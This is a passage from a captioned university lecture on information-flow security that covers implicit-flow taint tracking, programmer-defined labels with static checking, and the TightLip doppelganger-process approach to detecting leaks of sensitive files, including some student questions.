01:02:41,280 However, you can imagine that the system I just described 1298 01:02:41,280 --> 01:02:44,750 may be too conservative once again. 1299 01:02:44,750 --> 01:02:49,770 So imagine that instead of having this code here, 1300 01:02:49,770 --> 01:02:51,980 this was also 0. 1301 01:02:51,980 --> 01:02:56,300 So in this dump case, there's absolutely no reason 1302 01:02:56,300 --> 01:03:00,830 to taint x with anything related to the INEI, 1303 01:03:00,830 --> 01:03:03,590 because you didn't actually leak any information 1304 01:03:03,590 --> 01:03:04,995 in either of these branches. 1305 01:03:04,995 --> 01:03:09,780 But if you use it with a naive PC tainting scheme, 1306 01:03:09,780 --> 01:03:16,580 then you might over-estimate how much x has been tainted by. 1307 01:03:16,580 --> 01:03:18,730 So I should say there's some subtlety you 1308 01:03:18,730 --> 01:03:21,380 can do to try to get around some of these issues, 1309 01:03:21,380 --> 01:03:24,010 but it's a little bit tricky. 1310 01:03:24,010 --> 01:03:25,435 Does this all make sense? 1311 01:03:28,006 --> 01:03:28,505 All right. 1312 01:03:28,505 --> 01:03:29,373 AUDIENCE: Just a question. 1313 01:03:29,373 --> 01:03:30,339 PROFESSOR: Oh, sorry. 1314 01:03:30,339 --> 01:03:33,720 AUDIENCE: When you get out of the if statement, so you're out 1315 01:03:33,720 --> 01:03:36,062 of the branch, do you [INAUDIBLE] taint out? 1316 01:03:36,062 --> 01:03:37,520 PROFESSOR: Yeah, so typically, yes. 1317 01:03:37,520 --> 01:03:40,640 So like down here the PC taint would be cleared. 1318 01:03:40,640 --> 01:03:43,608 So it would only be set inside these branch things here. 1319 01:03:43,608 --> 01:03:45,566 And the reason for that is because essentially, 1320 01:03:45,566 --> 01:03:47,770 by the time you get down here, you 1321 01:03:47,770 --> 01:03:49,686 get down here regardless of what the INEI was. 1322 01:03:49,686 --> 01:03:51,114 So yeah, you clear that. 1323 01:03:51,114 --> 01:03:52,066 It's a good question. 1324 01:03:55,480 --> 01:03:55,980 Let's see. 1325 01:04:00,680 --> 01:04:03,860 You talked about how you might be able to taint 1326 01:04:03,860 --> 01:04:07,450 at this very low level, even though that might be expensive, 1327 01:04:07,450 --> 01:04:09,130 one reason why it might be useful 1328 01:04:09,130 --> 01:04:10,705 is because it will actually allow 1329 01:04:10,705 --> 01:04:12,680 you to do things like see what your data lifetimes look like. 1330 01:04:12,680 --> 01:04:14,763 So a couple lectures ago, we talked about the fact 1331 01:04:14,763 --> 01:04:16,990 that a lot of times key data, for example, 1332 01:04:16,990 --> 01:04:19,365 will live in memory longer than you think that it should. 1333 01:04:19,365 --> 01:04:24,612 So you can imagine that even if some of the x86 or ARM level 1334 01:04:24,612 --> 01:04:27,059 taint tracking is expensive, you can imagine 1335 01:04:27,059 --> 01:04:28,725 using it to form an audit of your system 1336 01:04:28,725 --> 01:04:30,190 and actually tainting, let's say, 1337 01:04:30,190 --> 01:04:32,415 some secret key that the user entered, 1338 01:04:32,415 --> 01:04:34,980 and just seeing where that goes throughout your system. 1339 01:04:34,980 --> 01:04:37,146 It's an offline analysis, it's not facing customers, 1340 01:04:37,146 --> 01:04:38,380 so it's OK for it to be slow. 1341 01:04:38,380 --> 01:04:40,810 That might actually really help you to figure out oh, 1342 01:04:40,810 --> 01:04:43,550 this data's getting into the keyboard buffer, 1343 01:04:43,550 --> 01:04:46,240 it's getting into the x server, it's getting to wherever. 1344 01:04:46,240 --> 01:04:49,240 So even if it's slow, that can still be very, very useful. 1345 01:04:49,240 --> 01:04:54,180 So I just wanted to mention that briefly. 1346 01:04:54,180 --> 01:04:57,290 One interesting thing you might think about 1347 01:04:57,290 --> 01:05:01,010 is the fact that as I mentioned, TaintDroid 1348 01:05:01,010 --> 01:05:06,490 is nice because it constrains the universe of taint sources 1349 01:05:06,490 --> 01:05:08,090 and taint sinks. 1350 01:05:08,090 --> 01:05:10,090 But as the developer, maybe you want to actually 1351 01:05:10,090 --> 01:05:17,895 explicitly assert some more fine grain control over the labels 1352 01:05:17,895 --> 01:05:19,270 that your program interacts with. 1353 01:05:19,270 --> 01:05:23,110 So now as a programmer, you want to be able to say something 1354 01:05:23,110 --> 01:05:23,900 like this. 1355 01:05:23,900 --> 01:05:30,320 So you query some int, and let's say we call it x, 1356 01:05:30,320 --> 01:05:34,320 then you associate some label with it. 1357 01:05:34,320 --> 01:05:36,360 Maybe the name of this label is that Alice 1358 01:05:36,360 --> 01:05:39,330 is the owner of this data, but Alice 1359 01:05:39,330 --> 01:05:42,320 permits Bob, or something labeled with Bob, 1360 01:05:42,320 --> 01:05:43,744 to be able to see that. 1361 01:05:43,744 --> 01:05:46,160 TaintDroid doesn't let you do this, because it essentially 1362 01:05:46,160 --> 01:05:47,830 controls that universe of labels. 1363 01:05:47,830 --> 01:05:49,534 But maybe as a programmer you want 1364 01:05:49,534 --> 01:05:51,510 to be able to do a thing like this. 1365 01:05:51,510 --> 01:05:56,770 You can imagine that your program has various input 1366 01:05:56,770 --> 01:06:01,825 channels and output channels, and all 1367 01:06:01,825 --> 01:06:03,898 of these input and output channels, 1368 01:06:03,898 --> 01:06:06,310 they all have labels, too. 1369 01:06:06,310 --> 01:06:08,950 And these are labels that you as a programmer 1370 01:06:08,950 --> 01:06:11,790 get to actually pick, as opposed to the system itself 1371 01:06:11,790 --> 01:06:14,600 trying to say here's this group of fine set of things. 1372 01:06:14,600 --> 01:06:23,620 So maybe say for input channels, you know the read values, 1373 01:06:23,620 --> 01:06:25,450 maybe they get the label of the channel. 1374 01:06:28,040 --> 01:06:33,777 That's very similar to how TaintDroid works right now. 1375 01:06:33,777 --> 01:06:35,360 So if you read something from the GPS, 1376 01:06:35,360 --> 01:06:37,359 that read value is the taint of the GPS channel, 1377 01:06:37,359 --> 01:06:43,330 but now you as a programmer can choose what those labels are. 1378 01:06:43,330 --> 01:06:47,590 And then you could imagine that for output channels that label 1379 01:06:47,590 --> 01:06:59,834 will channel has to match some label value we've written. 1380 01:07:05,020 --> 01:07:07,090 You can imagine other policies here as well. 1381 01:07:07,090 --> 01:07:09,170 But the basic idea is that there are actually 1382 01:07:09,170 --> 01:07:11,080 program managers that allow you the developer 1383 01:07:11,080 --> 01:07:14,055 to pick what the labels are and what 1384 01:07:14,055 --> 01:07:16,370 the semantics for those labels can be. 1385 01:07:16,370 --> 01:07:19,346 So what's nice about some of these 1386 01:07:19,346 --> 01:07:22,078 is they do require the programmer to do a little bit 1387 01:07:22,078 --> 01:07:26,650 more work, but the outcome of that work 1388 01:07:26,650 --> 01:07:30,100 is that static checking-- and by static checking 1389 01:07:30,100 --> 01:07:35,948 I mean checking that's done at compile time-- 1390 01:07:35,948 --> 01:07:42,530 can catch many types of information flow bugs. 1391 01:07:42,530 --> 01:07:46,534 So if you're diligent about labeling all of your network 1392 01:07:46,534 --> 01:07:49,861 channels and screen channels with the appropriate 1393 01:07:49,861 --> 01:07:52,266 permissions, and you're very diligent about leaving 1394 01:07:52,266 --> 01:07:54,090 your data like this, what can happen 1395 01:07:54,090 --> 01:07:56,930 is that at compile time, when you compile your program 1396 01:07:56,930 --> 01:07:59,077 and your compiler can tell you things like hey, 1397 01:07:59,077 --> 01:08:01,160 if you were to run this program, then you actually 1398 01:08:01,160 --> 01:08:05,150 have an information leak that this particular piece of data 1399 01:08:05,150 --> 01:08:07,910 will pass an equal channel, which is untrusted. 1400 01:08:07,910 --> 01:08:10,605 And at a high level, the reason why static checking 1401 01:08:10,605 --> 01:08:13,910 can catch a lot of these bugs is because usually speaking, 1402 01:08:13,910 --> 01:08:16,340 when you think of some of these annotations, 1403 01:08:16,340 --> 01:08:18,580 they're somewhat similar to types. 1404 01:08:18,580 --> 01:08:23,140 So the same way that compilers can catch errors 1405 01:08:23,140 --> 01:08:25,362 involving types and installing type language, 1406 01:08:25,362 --> 01:08:26,796 you can imagine that the compiler 1407 01:08:26,796 --> 01:08:29,664 in a language like this can codes some calculus 1408 01:08:29,664 --> 01:08:32,130 over this label, and in many cases, 1409 01:08:32,130 --> 01:08:35,251 determine hey, if you would actually run this program, 1410 01:08:35,251 --> 01:08:36,250 this would be a problem. 1411 01:08:36,250 --> 01:08:39,960 So you really need to fix the way that the labels work, 1412 01:08:39,960 --> 01:08:42,140 maybe you need to explicitly declassify something, 1413 01:08:42,140 --> 01:08:43,110 so on and so forth. 1414 01:08:43,110 --> 01:08:45,050 AUDIENCE: You can't just [INAUDIBLE]? 1415 01:08:48,445 --> 01:08:51,020 PROFESSOR: Yeah, yeah, that's right. 1416 01:08:51,020 --> 01:08:53,850 So depending on the language, these labels 1417 01:08:53,850 --> 01:08:57,380 can associate people with IO ports, all that kind of stuff. 1418 01:08:57,380 --> 01:08:59,533 That's exactly right. 1419 01:08:59,533 --> 01:09:02,949 So this is just interesting to know about, 1420 01:09:02,949 --> 01:09:06,729 because TaintDroid has a very nice general introduction 1421 01:09:06,729 --> 01:09:09,280 to this information flows stuff, but there's actually 1422 01:09:09,280 --> 01:09:10,863 some really hardcore systems out there 1423 01:09:10,863 --> 01:09:13,084 than can express much richer semantics 1424 01:09:13,084 --> 01:09:17,500 in the control of a program with respect to information flow. 1425 01:09:17,500 --> 01:09:20,180 And you know, too, that when we talk about static checking 1426 01:09:20,180 --> 01:09:21,596 and being able to catch many bugs, 1427 01:09:21,596 --> 01:09:24,406 it's actually preferable to catch as many bugs using 1428 01:09:24,406 --> 01:09:27,507 static checking and static failures as opposed 1429 01:09:27,507 --> 01:09:29,998 to dynamic checking and dynamic failures. 1430 01:09:29,998 --> 01:09:31,706 There's a very subtle but powerful reason 1431 01:09:31,706 --> 01:09:32,694 for why that is. 1432 01:09:32,694 --> 01:09:35,658 The reason is that, let's say that we 1433 01:09:35,658 --> 01:09:38,375 defer all of the static checks to the runtime, which 1434 01:09:38,375 --> 01:09:39,610 you could certainly do. 1435 01:09:39,610 --> 01:09:41,310 There's no reason you couldn't take all the static checks 1436 01:09:41,310 --> 01:09:42,435 and give you a name for it. 1437 01:09:42,435 --> 01:09:45,770 The problem is that the failure or success of these checks 1438 01:09:45,770 --> 01:09:48,359 is actually a covert channel, perhaps. 1439 01:09:48,359 --> 01:09:50,065 So the attacker could actually feed 1440 01:09:50,065 --> 01:09:52,090 your program some information and then see 1441 01:09:52,090 --> 01:09:53,819 whether it crashed or not. 1442 01:09:53,819 --> 01:09:55,720 And if it crashed, it might say, aha, 1443 01:09:55,720 --> 01:09:58,960 you've passed some dynamic check of information flow, that 1444 01:09:58,960 --> 01:10:01,956 must mean something was secret about this value I sort 1445 01:10:01,956 --> 01:10:03,800 of cajoled you into computing. 1446 01:10:03,800 --> 01:10:05,590 So you want to try to make these checks 1447 01:10:05,590 --> 01:10:10,240 as static as possible to the greatest possible extent. 1448 01:10:10,240 --> 01:10:14,480 If you want more information on this kind of stuff, maybe 1449 01:10:14,480 --> 01:10:17,818 a good place to start, a word to search is Jif. 1450 01:10:17,818 --> 01:10:20,041 It's a very influential system that 1451 01:10:20,041 --> 01:10:23,746 built some of these issues of label computation. 1452 01:10:23,746 --> 01:10:27,204 So you can start there and sort of roll forward. 1453 01:10:27,204 --> 01:10:29,674 My co-professor actually has done a lot of good work 1454 01:10:29,674 --> 01:10:31,340 on this, so you could ask him about that 1455 01:10:31,340 --> 01:10:34,614 if you want to talk more label stuff. 1456 01:10:34,614 --> 01:10:38,090 That's sort of interesting to know that TaintDroid 1457 01:10:38,090 --> 01:10:41,526 is actually fairly restrictive in the expressiveness 1458 01:10:41,526 --> 01:10:44,560 of the labels it allows you to look at. 1459 01:10:44,560 --> 01:10:46,143 There are systems out there that allow 1460 01:10:46,143 --> 01:10:48,150 you to do more powerful stuff. 1461 01:10:51,610 --> 01:10:58,734 Finally, what I'd like to talk about is what we can do if we 1462 01:10:58,734 --> 01:11:03,040 want to track information flows in some of these legacy 1463 01:11:03,040 --> 01:11:08,670 programs, or through programs that are written in C or C++ 1464 01:11:08,670 --> 01:11:12,040 that don't have all the fancy runtime support. 1465 01:11:12,040 --> 01:11:16,046 So there's a very cute system, some 1466 01:11:16,046 --> 01:11:20,620 of the same authors on this paper that looks at this issue 1467 01:11:20,620 --> 01:11:24,160 of how can we track informational leaks 1468 01:11:24,160 --> 01:11:28,143 in a system which we don't want to modify 1469 01:11:28,143 --> 01:11:29,101 the application at all. 1470 01:11:29,101 --> 01:11:30,568 This is the TightLip system. 1471 01:11:30,568 --> 01:11:33,013 So the basic idea is that they introduce 1472 01:11:33,013 --> 01:11:36,305 this notion of what they call doppelganger processes. 1473 01:11:42,020 --> 01:11:44,200 TightLip uses doppelganger processes evolved. 1474 01:11:44,200 --> 01:11:48,350 So the first thing it does is it periodically 1475 01:11:48,350 --> 01:11:54,082 scans a user's file system and it 1476 01:11:54,082 --> 01:11:57,690 looks for sensitive file types. 1477 01:11:57,690 --> 01:12:02,720 This might be things like your mail file, your word processing 1478 01:12:02,720 --> 01:12:04,859 documents, so on and so forth. 1479 01:12:04,859 --> 01:12:07,025 So what it's going to do for each one of these files 1480 01:12:07,025 --> 01:12:10,210 is it's going to produce a scrubbed version. 1481 01:12:13,410 --> 01:12:16,060 So for example, if it finds an email file, 1482 01:12:16,060 --> 01:12:22,002 it's going to replace the to or the from information with, 1483 01:12:22,002 --> 01:12:25,986 let's say, a string of the same length but just dummy data. 1484 01:12:25,986 --> 01:12:28,180 Maybe all spaces or something like that. 1485 01:12:28,180 --> 01:12:32,308 It does this as a background task. 1486 01:12:32,308 --> 01:12:36,772 Then the second thing it's going to do, at some point a process 1487 01:12:36,772 --> 01:12:40,035 is going to start executing, and so then TightLip 1488 01:12:40,035 --> 01:12:48,200 is going to detect when and if the process tries 1489 01:12:48,200 --> 01:12:49,605 to access a sensitive file. 1490 01:12:52,510 --> 01:12:57,220 And if such an access does take place, 1491 01:12:57,220 --> 01:13:01,986 TightLip is going to spawn one of these doppelganger 1492 01:13:01,986 --> 01:13:02,485 processes. 1493 01:13:05,520 --> 01:13:09,500 And so what the doppelganger process 1494 01:13:09,500 --> 01:13:14,896 looks like is very similar to the original process that 1495 01:13:14,896 --> 01:13:16,760 tried to touch that sensitive data, 1496 01:13:16,760 --> 01:13:21,786 but the key difference is that the doppelganger, which 1497 01:13:21,786 --> 01:13:27,460 I'll abbreviate DG, reads the scrubbed data. 1498 01:13:31,180 --> 01:13:34,460 So imagine that-- so the process is executing, 1499 01:13:34,460 --> 01:13:36,900 it tries to access your email file. 1500 01:13:36,900 --> 01:13:39,500 The system spawns this new process, the doppelganger, 1501 01:13:39,500 --> 01:13:42,769 that doppelganger is exactly the same as that original one, 1502 01:13:42,769 --> 01:13:44,810 but it is now reading from the scrub data instead 1503 01:13:44,810 --> 01:13:46,122 of the real sensitive data. 1504 01:13:48,760 --> 01:13:51,458 What happens then. 1505 01:13:51,458 --> 01:13:54,963 Essentially, TightLip, we're going 1506 01:13:54,963 --> 01:14:01,020 to run those two processes in parallel. 1507 01:14:01,020 --> 01:14:05,620 It needs to just watch them and see what they do. 1508 01:14:05,620 --> 01:14:09,842 And so in particular, we're going to see, 1509 01:14:09,842 --> 01:14:21,330 do the processes issue the same system calls 1510 01:14:21,330 --> 01:14:23,708 with the same arguments. 1511 01:14:28,050 --> 01:14:34,795 And if that's the case, then presumably those system calls 1512 01:14:34,795 --> 01:14:38,610 do not depend on the sensitive data. 1513 01:14:38,610 --> 01:14:41,410 So in other words, if I start a process that 1514 01:14:41,410 --> 01:14:43,160 tries to open some sensitive file, 1515 01:14:43,160 --> 01:14:46,390 I feed it basically junk data, I let it execute. 1516 01:14:46,390 --> 01:14:49,860 If that doppelganger process still does the same things 1517 01:14:49,860 --> 01:14:52,021 that the regular process would have done, 1518 01:14:52,021 --> 01:14:53,520 then presumably it wasn't influenced 1519 01:14:53,520 --> 01:14:56,550 by that sensitive data at all. 1520 01:14:56,550 --> 01:15:00,500 So essentially doppelganger will let these processes run, 1521 01:15:00,500 --> 01:15:02,379 TightLip will let these processes run, 1522 01:15:02,379 --> 01:15:03,920 and then check the system calls here. 1523 01:15:03,920 --> 01:15:09,445 And then it might happen that in some case the sys calls divert. 1524 01:15:13,530 --> 01:15:17,260 So in particular, what if the doppelganger 1525 01:15:17,260 --> 01:15:21,004 starts doing things that the regular version of the process 1526 01:15:21,004 --> 01:15:23,170 would not have done, and then the doppelganger tries 1527 01:15:23,170 --> 01:15:24,800 to make a network call. 1528 01:15:24,800 --> 01:15:27,210 So just like in TaintDroid, when that doppelganger tries 1529 01:15:27,210 --> 01:15:29,577 to make a network call, that's when we say aha, 1530 01:15:29,577 --> 01:15:31,660 we should probably stop what's happening right now 1531 01:15:31,660 --> 01:15:33,660 and then do something. 1532 01:15:33,660 --> 01:15:40,120 So if the system calls diverge, then the doppelganger 1533 01:15:40,120 --> 01:15:47,540 makes a network call, then we're going to do something. 1534 01:15:47,540 --> 01:15:50,980 So we're going to either raise an alert to the user 1535 01:15:50,980 --> 01:15:52,737 or whatever. 1536 01:15:52,737 --> 01:15:54,670 Kind of like in TaintDroid, but at this point 1537 01:15:54,670 --> 01:15:56,044 there's a specific policy you can 1538 01:15:56,044 --> 01:15:58,520 add in some particular system you're going to use. 1539 01:15:58,520 --> 01:16:00,728 But this is sort of an interesting point at which you 1540 01:16:00,728 --> 01:16:05,140 can say well, somehow that doppelganger process was 1541 01:16:05,140 --> 01:16:07,990 affected by that sensitive data that was returned. 1542 01:16:07,990 --> 01:16:10,390 That means that maybe if the user did not 1543 01:16:10,390 --> 01:16:12,597 think that a particular process was going 1544 01:16:12,597 --> 01:16:14,680 to get exfiltrated data, now the user can actually 1545 01:16:14,680 --> 01:16:16,940 do an audit of that program to figure out 1546 01:16:16,940 --> 01:16:20,600 why that program returned send that data over the network. 1547 01:16:20,600 --> 01:16:22,104 So does anyone-- go ahead. 1548 01:16:22,104 --> 01:16:23,992 AUDIENCE: So if you're hitting something 1549 01:16:23,992 --> 01:16:26,706 like a word file or whatever, you kind of 1550 01:16:26,706 --> 01:16:28,229 have to know what you're zeroing out 1551 01:16:28,229 --> 01:16:29,427 and what you're [INAUDIBLE]. 1552 01:16:32,593 --> 01:16:34,217 PROFESSOR: Good question, that's right. 1553 01:16:34,217 --> 01:16:36,133 So I was going to discuss some limitations, 1554 01:16:36,133 --> 01:16:38,008 and one of the limitations is precisely that. 1555 01:16:38,008 --> 01:16:40,874 You need to have per file type scrubbers. 1556 01:16:40,874 --> 01:16:42,746 So you can't just take your email scrubber 1557 01:16:42,746 --> 01:16:44,380 and use it for Word. 1558 01:16:44,380 --> 01:16:47,860 And in fact, if those scrubbers miss something, 1559 01:16:47,860 --> 01:16:50,670 so if they don't redact everything, 1560 01:16:50,670 --> 01:16:53,719 then this system may not catch all the possible sensitive data 1561 01:16:53,719 --> 01:16:54,360 leaks. 1562 01:16:54,360 --> 01:16:55,900 So you're exactly right about that. 1563 01:16:55,900 --> 01:16:57,130 But I think-- go ahead. 1564 01:16:57,130 --> 01:17:00,450 AUDIENCE: So if I understand, why 1565 01:17:00,450 --> 01:17:04,595 should the process look at the data before saying go ahead? 1566 01:17:04,595 --> 01:17:07,000 Why wouldn't you just send the stuff in? 1567 01:17:07,000 --> 01:17:09,240 PROFESSOR: Why would the process-- 1568 01:17:09,240 --> 01:17:12,740 AUDIENCE: If the process plans to input data, [INAUDIBLE]? 1569 01:17:15,410 --> 01:17:17,870 PROFESSOR: Oh, no, no. 1570 01:17:17,870 --> 01:17:20,650 From the perspective of the doppelganger, 1571 01:17:20,650 --> 01:17:22,335 I mean, it may try to, in fact, look 1572 01:17:22,335 --> 01:17:24,747 and see things like does this email address make sense, 1573 01:17:24,747 --> 01:17:26,580 for example, before it tries to send it out. 1574 01:17:26,580 --> 01:17:28,330 But the doppelganger process, it shouldn't 1575 01:17:28,330 --> 01:17:30,740 know that it's gotten this weird scrubbed data. 1576 01:17:30,740 --> 01:17:32,010 So this gets back a little bit to the question 1577 01:17:32,010 --> 01:17:33,134 we were just talking about. 1578 01:17:33,134 --> 01:17:37,620 If your scrubber doesn't scrub things 1579 01:17:37,620 --> 01:17:39,790 in a semantically reasonable way, 1580 01:17:39,790 --> 01:17:42,725 the doppelganger may, in fact, crash, for example. 1581 01:17:42,725 --> 01:17:45,080 It expects things in this sort of format, but it's not. 1582 01:17:45,080 --> 01:17:46,990 But at a high level, the idea is that we're 1583 01:17:46,990 --> 01:17:51,330 trying to trick the doppelganger into doing what it would do 1584 01:17:51,330 --> 01:17:54,690 normally, but on data that's different 1585 01:17:54,690 --> 01:17:57,080 in the original version and see if there 1586 01:17:57,080 --> 01:17:59,120 will be that divergence. 1587 01:17:59,120 --> 01:18:01,440 So one drawback is that, like we're discussing, 1588 01:18:01,440 --> 01:18:04,410 this basically puts the scrubbers in TCB 1589 01:18:04,410 --> 01:18:06,876 and if they don't work properly, doppelgangers might crash, 1590 01:18:06,876 --> 01:18:09,410 you might not be able to catch some violations, things 1591 01:18:09,410 --> 01:18:10,224 like that. 1592 01:18:10,224 --> 01:18:11,890 But the nice thing about this is that it 1593 01:18:11,890 --> 01:18:14,362 works with legacy systems. 1594 01:18:14,362 --> 01:18:15,820 So we don't have to change anything 1595 01:18:15,820 --> 01:18:17,680 about the application itself runs. 1596 01:18:17,680 --> 01:18:21,950 We just have to make some fairly minor changes to the OS kernel 1597 01:18:21,950 --> 01:18:25,020 to be able to track the system call stuff, and then 1598 01:18:25,020 --> 01:18:26,420 things sort of work. 1599 01:18:26,420 --> 01:18:27,336 It's very, very nice. 1600 01:18:27,336 --> 01:18:29,210 And the overhead of the system is essentially 1601 01:18:29,210 --> 01:18:31,810 the overhead of running an additional process, which 1602 01:18:31,810 --> 01:18:34,734 is fairly low in a modern operating system. 1603 01:18:34,734 --> 01:18:36,400 This is just sort of a neat way to think 1604 01:18:36,400 --> 01:18:40,970 about how to do some type of limited taint tracking 1605 01:18:40,970 --> 01:18:44,020 without doing heavyweight changes to the runtime 1606 01:18:44,020 --> 01:18:46,165 without requiring changes from the OS-- or sorry, 1607 01:18:46,165 --> 01:18:47,040 from the application. 1608 01:18:47,040 --> 01:18:49,490 AUDIENCE: Are we only doing parallel 1609 01:18:49,490 --> 01:18:51,940 or waiting for each one? 1610 01:18:51,940 --> 01:18:54,125 Are we running both processes and then 1611 01:18:54,125 --> 01:18:55,958 after that we can just check that the system 1612 01:18:55,958 --> 01:18:56,350 calls are the same? 1613 01:18:56,350 --> 01:18:56,840 Like when do we check-- 1614 01:18:56,840 --> 01:18:58,131 PROFESSOR: Yeah, two questions. 1615 01:18:58,131 --> 01:19:03,500 So as long as the doppelganger process does things 1616 01:19:03,500 --> 01:19:06,800 that the OS can control and keep on the local machine, 1617 01:19:06,800 --> 01:19:08,925 you can imagine running the doppelganger process 1618 01:19:08,925 --> 01:19:10,120 and the regular one forward. 1619 01:19:10,120 --> 01:19:14,240 But as soon as the doppelganger tries to affect external state, 1620 01:19:14,240 --> 01:19:16,200 so maybe the network is doing this and that. 1621 01:19:16,200 --> 01:19:18,722 Maybe you can think of some other linked sources like that. 1622 01:19:18,722 --> 01:19:20,180 Maybe there's something like pipes, 1623 01:19:20,180 --> 01:19:22,471 for example, that the kernel doesn't know how to create 1624 01:19:22,471 --> 01:19:23,670 doppelganger state for. 1625 01:19:23,670 --> 01:19:26,591 At that point you have to stop it and then declare 1626 01:19:26,591 --> 01:19:27,841 success or victory, basically. 1627 01:19:30,930 --> 01:19:33,262 Any other questions? 1628 01:19:33,262 --> 01:19:35,220 All right, well, that's the end of the lecture. 1629 01:19:35,220 --> 01:19:36,261 Have a good Thanksgiving. 1630 01:19:36,261 --> 01:19:38,080 See you next week.